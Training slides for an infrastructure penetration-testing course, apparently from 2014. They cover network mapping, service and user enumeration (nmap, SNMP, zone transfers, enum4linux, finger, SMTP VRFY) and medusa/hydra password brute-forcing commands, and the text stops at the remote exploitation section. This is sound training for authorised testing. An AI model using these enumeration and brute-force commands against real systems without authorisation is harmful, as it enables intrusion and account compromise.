Infrastructure Testing Training v1.0

Infrastructure
Testing Training
November 2014
Information Protection, UK
Who am I?
INTERNAL USE ONLY
• Marc Wickenden
• Technical Director at 4ARMED
• @marcwickenden
© 2011 KPMG LLP, a UK limited liability partnership, a subsidiary of KPMG Europe LLP and a member firm of the KPMG network of independent 2
member firms affiliated with KPMG International Cooperative ('KPMG International'), a Swiss entity. All rights reserved.
Agenda
INTERNAL USE ONLY
Background & Preparation
Network Layer - Mapping & Enumeration
Service & Vulnerability Enumeration
Windows – Remote Exploitation
Windows – Local Privilege Escalation
*nix – Remote Exploitation
*nix – Local Privilege Escalation
Summary & Capture the Flag (CTF)
What is an infrastructure penetration test?
INTERNAL USE ONLY
"An exploitative test of whether the target system's security

controls can be defeated"
What is an infrastructure penetration test?
INTERNAL USE ONLY
"An exploitative test of whether the target system's security

controls can be defeated"
Penetration tests are cyclic
INTERNAL USE ONLY
Identify Exploit
Not a Vulnerability Assessment
INTERNAL USE ONLY
Types of infrastructure penetration test
INTERNAL USE ONLY
• Black box
• Advantages:
• More like a real-world attack
• Disadvantages:
• Not really like a real-world attack
• White box
• Advantages:
• Deeper level of assurance, easier to achieve scope
• Disadvantages:
• Can "lead" the tester and actually be more time-consuming
What you need to test
INTERNAL USE ONLY
1. The right attitude

2. The basics nailed
3. Some tools
4. Creative and lateral thinking
Methodology
INTERNAL USE ONLY
Methodology
Methodology
Methodology
Phases of the Methodology
INTERNAL USE ONLY
1. Preparation
2. Mapping and Target Enumeration
3. Service Enumeration
4. Vulnerability Analysis
5. Exploitation
6. Post Exploitation
Preparation
INTERNAL USE ONLY
• Update toolkit
• Make sure licenses are valid
• Equipment check
• Scope – (more to follow)
Scope – Things to consider
INTERNAL USE ONLY
• Confirm the number of hosts within the test is still correct as per the scope.
• Are hosts firewalled? This will slow things down
• Are there any legacy / critical systems or slow network links that could be affected by
the testing?
• Are there Intrusion Prevention Systems (IPS)? This may require packet manipulation,
stealthy scans etc. again this will slow things down
• Example - Solaris hosts employ rate limiting on port scanning, this can significantly
slow things down, especially on UDP port scans
• What technologies underpin the network? Is it a big Windows domain, are there Linux
or Solaris hosts? Knowing this will help you focus and get ready the right tools
• Do you need to provide device MAC addresses of you laptop, does your laptop need to
be joined to the domain before network connectivity is granted?
• Check that you know who the technical contact is (often a network engineer) if things
go wrong on the day.
• Do you need to demonstrate AV/Patches before connecting to the network?
First things first…
INTERNAL USE ONLY
• Record the IP address on your testing laptop – every time it changes!

■ ipconfig /all >> ipcponfig.txt (Windows)
■ ifconfig –a >> ifconfig.txt (*nix)
• Perform passive network analysis – confirm correct VLAN
• Scan and traceroute to one host/IP – how long did it take? – scale that to the number of
hosts identified to see how long the whole scope might take to cover
• Consider an Nmap broadcast scan
• nmap -P0 --script "broadcast and not dos"
Network Layer – Mapping & Target Enumeration
INTERNAL USE ONLY
• Understand the IP network

• Addressing
• Subnets
• Routing
• Active hosts
• Draw a network map (bonus points with most clients who don't have one)
• Perform port scans
• If this is CHECK/PSN you need to show full port scans
Enumerating Hosts & Routing (tcpdump / wireshark)
INTERNAL USE ONLY
• Passive Wireshark capture – Any interesting broadcasts, identification of routing

protocols – BGP, OSPF etc. and potential routers/switch devices
• Straightforward Linux command line to capture ASCII packets from the default interface: -
• # tcpdump –X –s 0 –vv –l | tee <output file>
• Look for broadcast packets, e.g. from Windows NetBIOS, Cisco Discovery Protocol,
broadcast routing packets (e.g. RIP).
• CDP packets contain VLAN information, which may be useful if you wish to attempt
VLAN hopping later.
•Check the packet contents for hostnames, IP addresses etc.
• There may even be credentials (SMB, HSRP, etc)
Enumerating Hosts (Zone Transfers)
INTERNAL USE ONLY
• DNS servers transfer zone information between masters and slaves

• By default Windows DNS (often part of Active Directory) will not allow a zone transfer,
but Linux / Unix BIND installations frequently permit it.
• You can perform a zone transfer like this:
• nslookup syntax (Windows / Linux):
$ nslookup
>server <server-IP>
>set type=any
>ls –d <domain>
• On Linux you can use the axfr utility or dig:
$ axfr <domain>
$ dig <domain> @<NS IP Address> axfr
Enumerating Hosts & Networks (SNMP)
INTERNAL USE ONLY
• Simple Network Management Protocol (SNMP) very common on networking devices

• Provides ability to query or configure devices
• SNMP communicates over UDP on port 161
• Version 1/2c use "community string" – basically password (defaults are "public" and
"private")
• Version 3 introduced users, password and encryption
• Routers and hosts can reveal a great deal of information including routing tables,
hostnames, multiple interfaces and even usernames, installed software and process
lists.
Enumerating Hosts & Networks (SNMP)…
INTERNAL USE ONLY
• A number of different tools exist for SNMP scanning and subsequent querying:
• Snscan (Windows) – can scan whole ranges or lists of IPs with a supplied dictionary of
community strings
• GetIF (Windows) – can query SNMP in detail: http://www.wtcs.org/snmp4tpc/getif.htm
(needs to be run in compatibility mode on Win7)
• Snmpcheck (PERL) - http://www.nothink.org/perl/snmpcheck/
• Snmpwalk (Unix) – common snmp library / client packages found in most Unix
distributions.
• OneSixtyOne – Linux community string bruteforcer
• How to determine whether a target has the public community string using snmpwalk on
Linux: -
• $ snmpwalk –Os –v 1 –c public <IP address>
Enumerating Hosts and Networks (Windows Network)
INTERNAL USE ONLY
• Windows computers, workgroups and domains broadcast their presence on the network and
browse lists are automatically populated with Windows machines on the network. This can
provide an invaluable target list and can be used to identify significant components of the
network (e.g. Active Directory machines or SQL servers).
• It is possible to view the list of devices that your laptop can ‘see’ using the Windows ‘NET
VIEW’ command.
• It is also possible to see them via the GUI using the Windows Network Explorer application.
• Cain & Abel will also provide a list of machines on the network, including their role.
• To convert Windows hostnames to IP addresses, use nslookup or ping (which will also confirm
whether the device is up): -
C:\> PING LONADC1
Pinging lonadc1.client.int [192.168.0.130] with 32 bytes of data:
Reply from 192.168.0.130: bytes=32 time<1ms TTL=64
Ping statistics for 192.168.0.130:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Enumerating Hosts & Networks (Windows Network)
INTERNAL USE ONLY
• For Windows networks, it is useful to enumerate domain names and domain

information.
• Windows uses NetBIOS (UDP 137) for relaying much information about domains to
other Windows hosts on the network.
• Native Windows tools are best for this enumeration:
Window Command Action

net view /domain Lists identified domains on a network
net view /domain:<domain> Lists identified hosts in a specific domain
nltest /dclist:<domain> Lists domain controllers on a domain
nbtstat –A <IP address> Lists NetBIOS name table from a remote system
nbtscan <IP-range> As above but for whole network ranges
mbenum [-s \\server] [-d dom ]
[-f filter] -p <mode> Lists all device types in a domain
• Note: Cain & Abel will perform many of these tasks by default.
Enumerating Hosts & Networks – Joining it all Together
INTERNAL USE ONLY
• Putting it all together you will likely have at least: -
• Local Subnet
• Local Gateway
• DHCP Servers
• DNS Servers
• Active Directory Servers
• MSSQL Servers
• Web Servers
• All of these hosts may reside on a local or remote subnet, so it is then possible to expand
on these and draw up a potential list of networks.
• Using traceroute and hping it is possible to map the network path between the source and
the destination, which may reveal further networks containing targets within the
environment.
Mapping Routes
INTERNAL USE ONLY
• IP headers contain a Time To Live (TTL) field

• Prevents packets existing forever
• Each gateway decrements the TTL by one
• If TTL reaches zero the router discards packet and sends ICMP TTL Expired In Transit
to originating host
• We can send crafted IP packets to enumerate upstream devices
Mapping Routes: Example Network
INTERNAL USE ONLY
Mapping a network DEST
ICMP Echo
Reply
ICMP ECHO
Request
(TTL=2)
ICMP Time
Exceeded
ICMP ECHO (TTL=2)
Request
(TTL=1)
ICMP Time
Exceeded
(TTL=1)
Src Laptop
Mapping routes - traceroute
INTERNAL USE ONLY
• Traceroute - *nix and Windows implementations are different:

• Windows: tracert – uses ICMP packets.
• *nix: traceroute – uses UDP packets by default, you can specify ICMP with the ‘–I’ option.
• Almost certainly will be blocked. Almost a finding in itself if it works!
Mapping routes – hping3
INTERNAL USE ONLY
• hping3 – This tool can perform traceroutes using any protocol by simply specifying a
port number. It should be noted that often using port TCP port 80 in hping traceroutes
enumerates more intermediate hops.
• The example below is a TCP traceroute using hping3:
• $ hping3 –T –S –p <port #> <IP address>
• Note that the output “stops” on a hop that does not respond with a TTL packet, use CTRL-
Z to restart…
Mapping routes – Nmap
INTERNAL USE ONLY
• Nmap also has a traceroute option (--traceroute), this is very fast and useful on tests.
• On the windows or *nix command line ‘ping –r’ records IP addresses of intermediate
hops in the IP header. A maximum of 9 addresses can be recorded.
• Windows: ping –r 9 <host>
• *nix: ping –R <host>
Host Discovery
INTERNAL USE ONLY
• Host discovery on a local Ethernet network is 100% accurate – why?

• Firewalls operate at Layer 3 (and up)
Host Discovery – Network Layers
INTERNAL USE ONLY
Host A – 192.168.0.3 Host B – 192.168.0.4
TCP 4. Transport 4. Transport TCP
IP 3. Network 3. Network IP
ARP 2. Data 2. Data ARP
CABLE 1. Physical 1. Physical CABLE
Host Discovery
INTERNAL USE ONLY
• Therefore, ARP scans should be used on local subnets

• Remote subnets are not so easy
– Firewalls and other filtering devices come into play
– Often prudent to attempt a common ports TCP scan to start off (25, 80, 443, etc)
– Bear in mind a full port scan will need to be done as well
– At the end of the day we're looking for services to potentially exploit
– These services need to be available, firewall or not
Host Discovery
INTERNAL USE ONLY
Firewall ACL rules restricting ICMP but permitting 80/TCP to server
rt = 80)
ll)
)
a
PORT = 80
rew
firewall)
all)
Packet (SRC Po
by fi
fir ew
cked
y
acket (DST
y
db
(blocked b
(blo
t
o R ques
cke
(blo
uest
ly
e
TCP SYN/ACK
oR
ep
TCP SYN P
est
Req
ICM Ech
o Request
ch
equ
P
Echo
PE
ICM
R
ho
P
P Ec
ICM
ICMP Ech
ICM
Src Laptop
Arp Request
Arp Response
Host Discovery
INTERNAL USE ONLY
Ping sweeps: Nmap –sP <target(s)>

Useful options here include:
 --exclude (e.g. for your own IP address)
 --excludefile <file> (file of targets to be excluded)
 --traceroute (as the name suggests)
 -n (don’t resolve DNS – useful if a DNS server is not on the network / subnet)
 -vv more verbose output
 -oA output in All formats (Nmap, gNmap and xml)
Then select a sweep type, one of: -
 -PO (protocol scan – identifies which protocols are supported by a device)
 -PA (ARP sweep)
 -PE (ICMP ECHO sweep)
 -PM (ICMP Mask sweep)
 -PT (ICMP Timestamp sweep)
 -PS <port #> (SYN sweep on given port # or comma separated list)
 -PU <port #> (UDP sweep on given port # or comma separated list – though given the connectionless nature of the
protocol, a UDP sweep is very rarely used)
Host Discovery
INTERNAL USE ONLY
The output from a sweep file might look like this: -
# Nmap 6.25 scan initiated Mon Jan 20 10:31:39 2014 as: Nmap -sP -PA -vv -oA pingsweep.192.168.100.0 192.168.100.0/24
<CUT>
Nmap scan report for 192.168.100.109 [host down]
Nmap scan report for ddpbk1.TARGET.local (192.168.100.110)
Host is up (0.00030s latency).
MAC Address: 00:50:56:B2:00:05 (VMware)
Nmap scan report for dp-manage01.TARGET.local (192.168.100.112)
MAC Address: 00:50:56:B2:00:0D (VMware)
Nmap scan report for ddpdc1.TARGET.local (192.168.100.119)
MAC Address: 00:0C:29:EE:BB:BB (VMware)
Nmap scan report for ddpdc2.TARGET.local (192.168.100.120)
MAC Address: 00:50:56:B2:00:00 (VMware)
<CUT>
As the example output is an ARP scan then the tool also shows the target MAC address. It is straightforward to
manipulate/grep the gNmap output file to create specific target lists.
Exercise 1: Duration 45 minutes
INTERNAL USE ONLY
• Assign yourself an IP address on the network

• Draw a map of the network to which you’re connected:
• Identify different subnets
• Identify hostnames and/or IP addresses
• Identify router hops
Remember:
ping sweeps, traceroutes, SNMP, DNS zone transfers, etc…
Enumerating Services
INTERNAL USE ONLY
• Now that we’ve roughly identified the layout of the network and live hosts, we look at what
services these hosts offer (open ports).
• This is the point at which port scanning is carried out – the main services are normally served
via TCP and UDP therefore we ideally need to perform both types of scan.
• It is important to make pragmatic choices on the time available to conduct infrastructure tests, to
ensure that enough coverage can be achieved in the given timescales.
• Perform a scan of one host to see how long this takes. Full port scans of all ports (65536) may
not be realistic – concentrate on Nmap’s default port range, or if time is short use --top-ports ‘X’
to scan the ‘X’ most common ports
• In time-critical situations, you can use other scanners, such as Masscan to complete large
networks in a short time.
• Note: UDP scanning can take a long time for a number of reasons:
• the protocol is connectionless
• there are no guarantees on sent/received UDP packets
• a number of IP stacks rate-limit on UDP connections (especially Solaris hosts)
• As such, often only a services scan is undertaken of UDP ports. However, other tools could be
considering in this scenario.
INTERNAL USE ONLY
• Nmap again is the most common tool used for conducting port scans.
• It is important to fully understand how Nmap is operating with regard to its mode of port scanning to
ensure a reasonable coverage of hosts and ports is returned.
• Remember from the Nmap ping sweep usage the –P<type> flag specifies the protocol that is used for the
sweep?
• This flag is also used in port scans, but in this instance instructs Nmap how to identify the hosts to be
scanned.
• If this flag is omitted then the scanner will default to using a combination of ICMP ECHO and TCP port 80
to identify valid hosts.
• If a response is not received to the initial sweep requests within a given time then the target IP address will
NOT be port scanned.
• Using –P0 it is possible to instruct Nmap not to try to identify hosts to scan using ping, i.e. scan ALL IP
addresses.
• Once the target identification flag (-P<type>) has been set, then use the –s flag to specify the port scan
type. This defines the protocol (typically TCP or UDP but there are other types of malformed scans which
are commonly used to test firewall evasion) that is used for the scan.
• There are then other flags which can be used, including –p which specifies the port range (-p- specifies
ports 1-65535) as well as instructing Nmap to carry out additional supplementary functionality such as
Operating System fingerprinting (-O), network services banner grabbing (-sV) etc.
• The next slide provides more details on the various flags used in a port scan and the following slide
shows an example of conducting a portscan of a remote host using ICMP ECHO to identify the target
followed by a SYN scan on ports 80/TCP and 443/TCP.
INTERNAL USE ONLY
Nmap Port Scanning Cheat Sheet
-P<target id method> -s<portscan method) Other Common Options Output Type Targets
• -P0 – use nothing (portscan all) Most common scan types: - • -g <#> - source port of scans, • -oA <filename> - all • <TARGET IP,
• -PA – use ARP useful for fw evasion – try 20 output types range or list>
• -PI / -PE – use ICMP Echo • -sS – do a SYN scan and 53 (appends .gNmap / .
• -PM – use ICMP netmask • -sT – do a TCP full connect • -p – port range (e.g. 1-1024, Nmap and .xml) • -iL <text file of
• -PP – use ICMP Timestamp scan 21,22,23,53,80,443 or –p- for • -oN <filename> - targets>
• -PS80,443 – use TCP SYN on • -sU – do a UDP scan all) Nmap human
port 80 and 443 • -sL – don’t do a network scan • -O (Operating System fingerprint readable
• -PT80,443 – use full TCP at all, just list the targets to – careful on legacy systems can • -oG <filename> -
connect on port 80 and 443 the output (good for multiple cause crashes) Nmap machine
reverse DNS lookups or • -sV – poor choice of flag type by readable
generating target lists) Nmap author, but also conducts • -oX <filename> -
version fingerprinting of services XML output
More esoteric scan options – add to existing portscan • -oS <filename> -
(firewall testing): method script kiddy for lulz
• -sC – run additional scripts
• -sX – TCP XMAS scan (all • --reason – Nmap explains how it
flags set) came to determine the result in
• -sN – TCP Null scan (no flags the output
set) • --script – Nmap comes with lots
• -sA – TCP ACK scan (ACK of scripts that can enumerate
flag set) common info or identify
• -sF – TCP FIN scan (FIN flag vulnerabilities
set)
Also a number of timing options –
man Nmap
Enumerating Services: Example Port Scanning with Nmap
INTERNAL USE ONLY
# nmap -PE -sS -p 80,443 -vv -oA portscan.192.168.1.1 192.168.1.1

(Identify whether the target is up using ICMP ECHO REQUEST [1], received an ICMP ECHO REPLY [2] (positive)
therefore portscan the system on 80/TCP and 443/TCP by sending TCP SYN packets [3] and [5] – in this case a
SYN/ACK packet is returned [4] from the target (port open) on port 80/TCP and a RST packet [6] (port closed) on
443/TCP
5) TCP SYN Packet (DST PORT = 443)

= 80)
6) TCP RST Packet (SRC Port = 443)

3) TCP SYN Packet (DST PORT = 80)
4) TCP SYN/ACK Packet (SRC Port
1) ICMP Echo Request
2) ICMP Echo Reply
Enumerating Services: Understanding Nmap TCP Scan Output
INTERNAL USE ONLY
TCP is connection-orientated and therefore will provide responses in most cases to the
protocol opening sequence.
Nmap will report that each port on any given TCP scanned target is: -
• Open – received a TCP SYN/ACK response within the timeout interval.
• Closed – received a TCP RST response within the timeout interval.
• Filtered – Nmap did not receive a response in the timeout interval. This can mean: -
• The IP address is not being used at all or is completely protected by network security
firewall - particularly if all other ports are filtered (Filtered)
• The destination port is filtered by a firewall – if other ports on the target IP address are
open then this is likely to be the case (Filtered)
• Network conditions meant that a TCP response packet was not received prior to the
timeout – (WARNING! THE TESTER HAS MISSED SOMETHING!)
Enumerating Services: Understanding Nmap UDP Scan Output
INTERNAL USE ONLY
UDP is a connectionless protocol, so it is not as straightforward to identify

• no specific UDP protocol opening sequences, just the application protocol itself.
• The target’s IP stack sends back an ICMP PORT_UNREACHABLE packet back to the source if it is not
used.
Nmap will report that each port on any given UDP scanned target is: -
• Open – received a UDP packet back, the application protocol has responded, even to a likely mismatched
initial application protocol connection
• Closed – Nmap received an ICMP PORT_UNREACHABLE response.
• Open|Filtered – No response in the timeout interval. This can mean: -
• The UDP port is being used but the source did not send the correct application protocol sequence (Open)
• The IP address is not being used at all or is completely protected by network security firewall - particularly if
all other ports are filtered (Filtered)
• The destination port is filtered by a firewall (Filtered)
• Network conditions meant that a TCP response packet was not received prior to the timeout – (WARNING!
THE TESTER HAS MISSED SOMETHING! )
Enumerating Services: Nmap Output
INTERNAL USE ONLY
The output from a TCP port scan Nmap output file might look like this: -
# Nmap 6.25 scan initiated Tue Feb 25 09:25:17 2014 as: Nmap -sS -v -oA portscan.tcp.services.europe -i europe.txt -sV -n
<CUT>
Nmap scan report for 192.168.204.2 Some ports are open but
remaining ports are closed
Host is up (0.068s latency). (more likely not behind a
All 1000 scanned ports on 192.168.204.2 are closed firewall)
Nmap scan report for 192.168.204.3

Not shown: 996 closed ports
PORT STATE SERVICE VERSION
2001/tcp open telnet Cisco router telnetd
4001/tcp open tcpwrapped
6001/tcp open tcpwrapped
Port 80 and 443 are open
9001/tcp open tcpwrapped but remaining ports are
Service Info: OS: IOS; Device: router; CPE: cpe:/o:cisco:ios filtered (likely behind a
firewall)
Nmap scan report for 192.168.204.7

Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http?
443/tcp open ssl/http Juniper SA2000 or SA4000 VPN gateway http config
Service Info: Device: proxy server Ports are open and Nmap
<CUT> fingerprinted the SSL port
to be a Juniper firewall /
VPN login page
Enumerating Unknown Services: nc and ncat
INTERNAL USE ONLY
• Some ports are open, but do not respond with common protocol responses – Nmap
will not fingerprint them!
• nc and ncat are incredibly powerful tools – useful for:
• Port scanning (built-in scanning).
• Setting up network listeners (UDP and TCP) – with options to bind to program such as
cmd.exe.
• Probing unknown services or unusual ports and then try typing different commands and
inputting different text to elicit a response.
• It is important to probe all unknown/unusual ports
• When probing unknown service ports, send common protocol commands and other
sequences to the ports to determine whether they provide any further responses, as
demonstrated below.
• $ nc –nvv <IP address> <port>
Poor man's nmap using netcat
INTERNAL USE ONLY
• Netcat is often installed on Linux boxes. Behold the poor man's port scanner:
• $ for port in $(seq 1 65535);

• do nc -z 10.0.1.14 $port && echo "tcp/$port";
• Done
• Will give you output like this:
tcp/21
tcp/53
tcp/80
tcp/135
tcp/139
tcp/445
tcp/3389
Enumerating Hosts, Networks & Services – Joining it all Together
INTERNAL USE ONLY
• Enumeration progress so far: -
• Network maps.
• Multiple targets on different networks.
• Understanding of important online resources (name servers, active directory servers, file
servers, routers, firewalls, etc.).
• Available network application services (web servers, administrative login ports, databases) with
their vendors, versions and in some cases underlying Operating Systems and hostnames etc.
• This may be the stage at which to perform a vulnerability scan
Enumerating Users - Windows
INTERNAL USE ONLY
• Always useful to enumerate user accounts of different services at this point – usually
easy to do and can come in useful – informs on username format (can then create
custom username dictionaries for brute-force attacks), and may have default or weak
credentials configured
• Windows-specific username enumeration:
• Null Connection / RID cycling (depending on registry settings of the servers – i.e.
RestrictAnonymous) tools include Getacct, sid2user/user2sid, Cain & Abel, enum4linux
• Misconfigured/open LDAP – multiple tools available for this
• SNMP – reveals users / groups on the box! (see earlier slides on SNMPwalk)
• Open SMB shares might reveal usernames (home directories)
Enumerating Users - *nix
INTERNAL USE ONLY
• *nix-specific username enumeration:

• Finger – show who is logged in or have a guess!
• Ruser / Rwho – show who is logged in
• SMTP EXPN/VRFY/Mail To: - guess remote usernames
• SNMP – can get a process tree, which will includes user names that are running
processes at the time (see earlier slides on SNMPwalk)
• Login timing attacks – some network services take longer to respond for valid usernames
than invalid ones
• Open SMB / NFS shares might reveal usernames (home directories)
Enumerating Users - Web
INTERNAL USE ONLY
• Web Servers:
• phpinfo() – PHP script that will return some information, sometimes usernames in paths /
processes
• Web server physical path leakage (sometimes within home directories containing a
username)
• Web content, can contain usernames in comments etc.
• Web application / management console logins – different responses for known / unknown
usernames
Windows User Enumeration: Null/Anonymous and RID Cycling
INTERNAL USE ONLY
• Windows allows systems to legitimately make remote requests for users, groups and
other information from a remote device.
• In earlier versions of Windows this was enabled by default. In the latest versions of
Windows Server and Desktop software, the functionality is disabled by default.
• However, if the software is upgraded (rather than a fresh re-install) then the previous
setting (the RestrictAnonymous registry key) still applies.
• When RestrictAnonymous is set to 0, a great deal of information can be retrieved
including users, groups, password policy information, shares etc. This can be
enumerated via a null / anonymous connection to the device.
• When RestrictAnonymous is set to 1 then null connections are refused, however, a
method known as RID Cycling can be used to enumerate usernames from given User
ID formats. Incremental calls can be made to enumerate users on the system, though it
should be noted that users that are ‘deleted’ or disabled will still be provided.
• Local Administrator account (nearly) always has a RID value of 500 and the guest 501.
User / machine accounts then start from 1000.
Windows User Enumeration: Null/Anonymous and RID Cycling
INTERNAL USE ONLY
• Enumeration tools:
• getacct
• enum
• enum4linux
• Cain & Abel
• Nessus
• Metasploit
Enum4linux
INTERNAL USE ONLY
• Example of using enum4linux to enumerate users, groups, shares et al using a null

connection: -
• enum4linux –GULPS <IP Address>
• Using the tool to enumerate users using RID cycling, if there is a user with a RID of 2000,
then try again and increase it! It’s worth noting that NB: Samba servers often seem to have
RIDs in the range 3000-3050, so be sure to check:
• enum4linux –r –R 500-2000 <IP address>
• Look at the help page (enum4linux.pl –h) to find detailed information on the various methods
and flags. It is also possible to use the tool to test username and password combinations
against the target system and domain.
• You can also extend this functionality using ‘polenum’ to extract the password policy also.
Unix Username Enumeration: Finger
INTERNAL USE ONLY
• Finger is a legacy Unix service, it was used when the network was a much ‘friendlier’ place. Its
function was used to determine when colleagues may be using remote workstations.
• Without the use of a username (finger @<IP address>) it responds with who is logged onto the
workstation.
• When a username is provided (finger <user>@<IP address>) it responds with useful information
such as whether that user exists, where they logged in from and their last login time. This is
useful for profiling targets and identifying IP addresses of administrative workstations or other
servers.
• Different uses of finger:
• $ finger @ip-address (might return all the logged in users)
• $ finger "a b c d e f g h"@ip-address (Solaris bug that returned all users ( < Early Solaris 8))
• $ finger "1 2 3 4 5 6 7 8 9 0"@ip-address (Solaris)
• $ finger 0@ip-address (returns users with blank GECOS entries - Solaris)
• $ finger -l .@ip-address
• $ finger -l **@ip-address
• $ finger -l user@ip-address
• The perl script fist.pl automates this and often finds multiple users.
Unix Username Enumeration: Rusers / RWho
INTERNAL USE ONLY
• Similar to finger, these (below) are legacy Unix RPC services.
• Rusers displays a list of logged in users
• $ rusers –la <IP address>
• Rwho collects broadcast information from other machines on the network and collates
who is logged in. This is functionality is very rarely in use, but if you have
compromised a remote legacy machine in a cluster then it may be worth attempting:
• $ rwho
Unix Username Enumeration: Sendmail SMTP Enumeration
INTERNAL USE ONLY
• By default, the Sendmail service (commonly on 25/TCP) will allow remote guessing of
usernames on the system using a variety of verbs.
• Depending on the response from the server to the guessing attempts, it may be
possible to identify whether the username is valid or not, by comparing the responses.
• Try these commands on Sendmail (and other) SMTP services (use Netcat or Telnet): -
■ VRFY <username>
■ EXPN <username>
■ HELO localhost
■ MAIL FROM: <root>
■ RCPT TO: <username>
• Many tools and scripts exist to automate the process, including Hydra (see following
slides).
INTERNAL USE ONLY
• Perform a port scan of BETA (10.0.2.3) and GAMMA (10.0.2.40)

• How many open TCP ports does each host have?
• How many open UDP ports does each host have?
• What services are running?
INTERNAL USE ONLY
• Enumerate all hosts on the 10.0.2.0/24 network. Identify any domains and enumerate
those.
• Enumerate users and password policies.
• Explore the tools (and any others) from the previous slides.
Vulnerability Enumeration Automated…
INTERNAL USE ONLY
• Nessus is a great tool to baseline vulnerabilities and to supplement the test findings.
• You should run Nessus against prioritised, known, live hosts only. It’s good practice to
input only lists of ‘up’ hosts enumerated during host discovery phase.
• Nessus scan policy – It is important to define this depending on the network.
• Care should be taken to configure a default policy that works for you and is tailored on a
per-test basis, to be specific to the environment (ensure verbose reporting is enabled!).
• This phase isn’t just about interpreting Nessus output, as Nessus lacks the context of a
network and people. This is where we need to provide insight and make connections
between the findings. For example;
• Anonymous FTP – Nessus won’t know if an excel spreadsheet served via anonymous FTP
contains domain usernames and passwords. Nessus would mark this a medium-level finding.
• Unknown software – Nessus only knows about common software. A bespoke telnet
application may be running for example, which has a number of vulnerabilities, however,
Nessus cannot evaluate this.
• It’s also worth noting that Nessus is very limited in what it can detect within Web Applications.
• Useful: Nessus can filter by ‘has exploit’ and can cross-reference this with Metasploit.
Vulnerability Scans – Be careful!
INTERNAL USE ONLY
• Arguably the most common cause of unintended consequences on target infrastructure.

• A vulnerability scan can take a lot of network bandwidth or server resources (client
complaints around ‘slowdown’)
• Undertakes many different techniques to identify issues which may lead to issues
particularly with old or unstable software applications (client complaints about ‘applications
becoming unavailable’).
• Ensure that ‘safe checks’ are enabled. Nessus has a love-hate relationship with printers, for
example.
• Effectively using a vulnerability scanner such as Nessus, is probably a training course in
itself!
Vulnerability Enumeration MANUAL!
INTERNAL USE ONLY
• Do not rely on a vulnerability scanning tool.

• The client can run a vulnerability scan themselves
• This is the fundamental reason why they are purchasing a penetration test!
Vulnerability Enumeration MANUAL!
INTERNAL USE ONLY
• Often, there are many reasons why a scanner will not find a vulnerability or weakness:
• The service is running on a non-standard port.
• Network / Server / Client performance conditions lead to a timeout.
• The scanner is buggy (believe it or not).
• Intrusion Detection and Prevention identified the scanner and blocked all subsequent attempts.
• Smart system administrators change the configuration of targets during the test.
• Misconfigured scanner configuration or policy.
• A vulnerability that exists on the network is complex or multi-staged and cannot be identified by
a scanner.
• The scanner is not conducting password guessing / dictionary / brute force attacks
• The scanner does not interpret Web / FTP / Telnet site content
• The scanner does not try combinations of input to a network application based on the context of
the environment.
• Ultimately a penetration tester is smarter than Nessus!
Vulnerability Enumeration - MANUAL!
INTERNAL USE ONLY
• Find your own vulnerabilities – firstly, investigate the applications and versions that
were identified from the previous phases.
• Don’t forget to look at information from web servers, e.g. SAP, ColdFusion, .NET, PHP
server applications as well as off the shelf web content (lots of content is vulnerable).
• Appliances can also be vulnerable to specific weaknesses and exploits.
• Check common information security vulnerability sources (Securityfocus, exploit-db,
CVE/NVD et al) and use search engines.
Vulnerability Enumeration - MANUAL!...
INTERNAL USE ONLY
• Be thorough, do not give up if the answer is not on the first page of results!
• Determine whether some weaknesses lead to information leakage that could assist
with other exploits, e.g. anonymous connections, RID cycling, SNMP on a Windows
system, finger, SMTP VRFY/EXPN / RUSERS et al on a *nix box, or PHPINFO, physical
path revelation issues, Apache server-status on web servers.
• Piece together all of the elements of the ‘jigsaw’ and hopefully it will solve the puzzle!
Use information from one finding and feed it into another exploit attempt. For example,
take a username identified from an information leak and try and login to all open SSH
ports using that username and common passwords.
Exercise 4: Vulnerability Enumeration: Duration 20 minutes
INTERNAL USE ONLY
• Enumerate all vulnerabilities on BETA (10.0.2.3) and ECHO (10.0.2.7)
• How many critical and high risk vulnerabilities exist for each host?
• How many Metasploit exploits exist for each host?
Automated Password Guessing
INTERNAL USE ONLY
• Automated password guessing is the process of trying different combinations of

usernames and passwords for a login service using a programmed tool.
• It is possible to carry out a dictionary or brute force attack, which uses many
combinations and iterations of characters at varying lengths.
• There are thousands of brute-force tools, some generic, some bespoke for different
services. By far the best and most reliable is Medusa and Hydra – multi-purpose for
multiple services
• One of the best services to brute force is SMB – usually always open/available and very
quick
• It is best to try and brute force fast (unencrypted) login interfaces such as FTP, telnet,
HTTP basic auth, POP3 et al
• It can be useful to try this before actually exploiting vulnerabilities BUT….
Password Bruteforcing – Be careful!
INTERNAL USE ONLY
NOTE: before beginning this type of attack:
• Be aware of password policies, or at least take care when brute-forcing accounts on

different services – (neat trick here)
• Make the client aware you will be performing this type of action
• Use throw-away account credentials you have been provided should this be a white-
box scenario and you’re testing account or password reuse.
• If in doubt, only try 1 to 2 different passwords per user to minimise potential impact.
• It may be possible to enumerate the account lockout policy remotely on Windows (see
enum4linux)
Automated Password Guessing (medusa)
INTERNAL USE ONLY
• It is possible to show all of the brute force modules in medusa with: -

• medusa –d
• Then you can try brute force with a variety of options (usually lower case flag = single
try whereas upper case = read from a file)
• $ medusa –M <module> -u <username> -p <password> -e ns –h <host> -n <port (if not
default)> -s –O <append to output file>
• Where: -
• “–e ns” tries a password the same as the username (s) and a blank password for all login
attempts (n)
• -s specifies the service uses SSL
• Example of bruteforcing ftp accounts on 10.10.10.10 taken from the file ftpusers.txt with the
password ftppass, the password the same as the username: -
• $ medusa –M ftp –U ftpusers.txt –p ftppass –e s –h 10.10.10.10 –O medusa.ftp.txt
Automated Password Guessing (hydra)
INTERNAL USE ONLY
• It is possible to show all of the brute force modules in hydra with: -

• hydra
• Then you can try brute force with a variety of options (usually lower case flag = single
try whereas upper case = read from a file)
• $ hydra -l <username> -p <password> -e ns -s <port (if not default)> -S –o <append to
output file> <TARGET IP> <MODULE NAME> <MODULE OPTIONS>
• Where: -
• “–e ns” tries a password the same as the username (s) and a blank password for all login
attempts (n)
• -S specifies the service uses SSL
• Example of bruteforcing the SMB administrator account on 10.10.10.11 with passwords
taken from the file smbpass.txt and the password blank: -
• $ hydra -f –l administrator –P smbpass.txt –e n –o medusa.smb.txt 10.10.10.11 smb
Windows Remote Exploitation
INTERNAL USE ONLY
• It is also possible to attempt the exploitation of specific flaws in the software, setup
and configuration of the target system.
• Different types of Windows exploitation include:
